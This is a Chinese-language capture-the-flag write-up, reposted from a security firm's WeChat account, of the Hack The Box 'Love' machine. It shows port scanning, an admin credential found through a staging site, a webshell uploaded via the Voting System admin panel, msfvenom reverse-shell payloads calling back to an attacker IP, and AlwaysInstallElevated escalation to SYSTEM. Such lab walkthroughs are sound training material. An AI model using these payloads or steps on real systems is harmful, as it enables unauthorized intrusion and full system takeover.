Hack The Box-Love

admin 2022年6月23日19:21:57安全文章评论3 views1921字阅读6分24秒阅读模式

0x01 靶场描述

    Hack the box 是国外的一个靶机平台,里面的靶机包含多种系统类型,并且里面可以利用的漏洞类型多种多样,有很多靶机其实非常贴近实战情景。因此 HTB 是一个很好的学习渗透测试靶场,官网:https://www.hackthebox.eu/invite。Love特性如图:Hack The Box-Love

0x02 靶场复现

知识点: 端口扫描、漏洞查找、voting system后台任意文件上传、windows alwaysinstallelevated提权


一、端口扫描、漏洞查找、voting system后台任意文件上传


1.使用nmap扫描,发现该目标开启了80、443和5000等端口,且发现443端口认证证书提示两个域名,分别为love.htbstaging.love.htb

nmap -A -sS -sV -sC 10.10.10.239 #-A强力扫描 -sS SYN扫描 -sV识别服务版本 -sC调用脚本扫描

Hack The Box-Love


2.打开本地hosts文件,将两个域名解析为靶场地址

vi /etc/hosts10.10.10.239 love.htb staging.love.htb

Hack The Box-Love

3.访问staging.love.htb的demo并扫描本地的5000端口,发现账户密码(这步没有原理,撞运气)

http://localhost:5000admin: @LoveIsInTheAir!!!!

Hack The Box-Love


4.尝试登录,登录成功(注:Voting System需要加/admin才是真的登录页面)

http://10.10.10.239/admin/

Hack The Box-Love


5.上传哥斯拉马

Voters → +New → 表单填任意即可上传 → 上传后http://10.10.10.239/images/目录可看到,且可以解析

Hack The Box-Love


6.生成并上传运行一个msf tcp反向连接马

1.生成msf马:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe > shell.exe
2.msf监听:use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 10.10.14.2set lport 4444exploit
3.哥斯拉上传并运行得到一个shell

Hack The Box-Love


二、windows alwaysinstallelevated提权

前置知识: 当注册表中的alwaysinstallelevated设置为0x1时,机器上运行任何的msi程序,均会以system权限执行,我们只需生成一个msi的木马程序即可提权。


1.查看一下alwaysinstallelevated的设置,发现设置为0x1

reg query HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindowsInstallerreg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller

Hack The Box-Love


2.生成并上传运行一个msf tcp反向连接的msi马,提权到system,并且得到flag

1.生成msf马:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=5555 -f msi > shell.msi
2.msf监听:use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 10.10.14.2set lport 5555exploit
3.哥斯拉上传并运行得到一个权限为system的shell
4.查看flagcat c:/users/administrator/desktop/root.txt

Hack The Box-Love

(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)


0x03 公司简介

江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......

编制:sm

审核:fjh

审核:Dog



原文始发于微信公众号(融云攻防实验室):Hack The Box-Love

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月23日19:21:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Hack The Box-Love http://cn-sec.com/archives/1138249.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: